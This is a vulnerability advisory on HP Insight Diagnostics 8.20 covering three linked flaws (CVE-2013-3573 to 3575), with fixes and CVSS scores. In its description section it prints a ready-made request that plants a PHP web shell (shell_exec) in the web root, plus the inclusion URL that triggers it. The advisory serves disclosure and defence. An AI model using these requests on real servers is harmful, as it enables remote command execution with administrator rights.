Vulnerability Note VU#324668

HP Insight Diagnostics 8.20 b2878 multiple vulnerabilities

Original Release date: 10 Jun 2013 | Last revised: 30 Jul 2014

Overview

HP Insight Diagnostics 8.20 b2878 and possibly earlier versions contains multiple vulnerabilities.

Description

It has been reported that HP Insight Diagnostics 8.20 b2878 and possibly earlier versions contains multiple vulnerabilities that can be exploited by a remote attacker to execute arbitrary PHP code thus arbitrary commands with administrative privileges.

CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') - CVE-2013-3573

CWE-73: External Control of File Name or Path - CVE-2013-3574
HP Insight Diagnostics contains two vulnerabilities that together allow an attacker to inject arbitrary data into a file that is stored at an arbitrary location on the server via the "devicePath" parameter (formerly "mount" in older versions).
https://<host>:2381/hpdiags/frontend2/commands/saveCompareConfig.php?filename=comparesurvey&target=winhardrive&device=&devicePath=C:/hp/hpsmh/data/htdocs/hpdiags/frontend2/help/&category=all&advanced=yes&leftFile=surveybase.xml&leftFileName=<%3f=shell_exec($_REQUEST[0])%3b%3f>&rightFile=survey.lastwebsession.xml&rightFileName=-&changesOnly=yes&overwrite=yes

CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program - CVE-2013-3575
HP Insight Diagnostics contains a local file inclusion vulnerability that is limited to ".html" inside the "<document-root>/hpdiags/frontend2/help/" directory.
https://<host>:2381/hpdiags/frontend2/help/pageview.php?path=comparesurvey.html

Impact

By combining these vulnerabilities, an authenticated remote attacker may be able to execute arbitrary commands on the server with administrator privileges.

Solution

We are currently unaware of a practical solution to this problem.

CVE-2013-3573 - Fixed in HP Insight Diagnostics 8.20 b2878
CVE-2013-3574 - Fixed in HP Insight Diagnostics 9.52
CVE-2013-3575 - Fixed in HP Insight Diagnostics 9.52

Restrict Network Access

As a general good security practice, only allow connections from trusted hosts and networks. Restricting access would prevent an attacker from connecting to the service from a blocked network location.

Vendor Information (Learn More)

VendorStatusDate NotifiedDate Updated
Hewlett-Packard CompanyAffected05 Apr 201306 Jun 2013
If you are a vendor and your product is affected, let us know.

CVSS Metrics (Learn More)

Group Score Vector
Base 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Temporal 5.0 E:U/RL:U/RC:UC
Environmental 1.2 CDP:ND/TD:L/CR:ND/IR:ND/AR:ND

References

Credit

Thanks to Markus Wulftange from Daimler TSS for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

Feedback

If you have feedback, comments, or additional information about this vulnerability, please send us email.